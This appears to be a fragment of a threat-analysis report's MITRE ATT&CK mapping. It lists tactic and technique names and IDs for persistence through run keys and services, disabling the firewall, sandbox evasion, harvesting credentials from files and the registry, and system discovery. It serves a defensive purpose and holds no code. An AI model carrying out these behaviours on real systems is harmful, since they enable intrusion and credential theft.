Scheduled Task/Job

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Virtualization/Sandbox Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Credentials in Registry

T1552.002

Discovery

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

System Information Discovery

Virtualization/Sandbox Evasion